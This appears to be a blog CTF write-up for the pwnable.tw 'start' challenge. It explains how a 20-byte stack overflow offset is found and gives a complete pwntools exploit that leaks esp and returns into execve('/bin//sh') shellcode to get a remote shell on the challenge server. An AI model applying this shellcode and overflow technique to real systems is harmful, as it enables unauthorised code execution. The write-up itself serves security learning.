start


checksec


Inspecting in IDA

Only two functions are present, _start and _exit. The int 80 instructions show that the program does its work through direct system calls rather than libc.

Debugging in gdb shows the overflow offset to the saved return address is 20 bytes.
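How an offset like that is normally measured: send a cyclic (de Bruijn) pattern, read the four bytes that land in EIP at the crash, and look them up in the pattern. The block below is an added example, not the original writeup's code and not pwntools; it reimplements the `cyclic`/`cyclic_find` idea in plain Python, and the 20-byte buffer in `simulate_crash` is a constructed stand-in for the real binary.

```python
from itertools import product  # only used to show the alphabet size is what gives uniqueness

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Return a de Bruijn sequence B(k, n): every length-n window is unique."""
    k = len(alphabet)
    a = [0] * k * n
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (what you would send as input)."""
    return de_bruijn(n=n)[:length]


def cyclic_find(subseq, n=4):
    """Offset of an n-byte window in the pattern; accepts bytes or the
    little-endian integer gdb prints as the faulting EIP."""
    if isinstance(subseq, int):
        subseq = subseq.to_bytes(n, "little")
    return de_bruijn(n=n).find(subseq)


def simulate_crash(payload, buf_len=20):
    """Constructed model of a stack frame: a buf_len-byte buffer followed
    directly by the saved return address. Returns the 4 bytes that would
    overwrite it, i.e. what gdb would show in EIP."""
    if len(payload) < buf_len + 4:
        return None
    return payload[buf_len:buf_len + 4]


if __name__ == "__main__":
    pattern = cyclic(100)
    eip = simulate_crash(pattern)
    print("offset =", cyclic_find(eip))  # 20 for the constructed frame above
```

Because k = 26 and n = 4, any window of four bytes is unique within the first 26^4 = 456976 bytes, so a single crash pins the offset without guessing.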

Exploit

```python
from pwn import *

context.arch = 'i386'
context.log_level = "debug"
pro = remote("chall.pwnable.tw", 10000)
ret = 0x8048087  # address of the write syscall inside _start; returning here leaks esp

# execve("/bin//sh", NULL, NULL) through int 0x80
shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
'''
# equivalent shellcode assembled with pwntools
shellcode = asm('\n'.join([
    'push %d' % u32(b'/sh\0'),
    'push %d' % u32(b'/bin'),
    'xor edx, edx',
    'xor ecx, ecx',
    'mov ebx, esp',
    'mov eax, 0xb',
    'int 0x80',
]))
'''

pro.recvuntil(b"CTF:")
pro.send(b'a' * 20 + p32(ret))                  # first overflow: return into the write to leak esp
shell_addr = u32(pro.recv()[:4])                # first 4 leaked bytes are the stack pointer
pro.send(b'A' * 20 + p32(shell_addr + 20) + shellcode)  # second overflow: return to the shellcode placed after the return address
pro.interactive()
```


Tags: pwn, pwn writeup, pwnable.tw

Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 3.0. Please credit the source when reposting!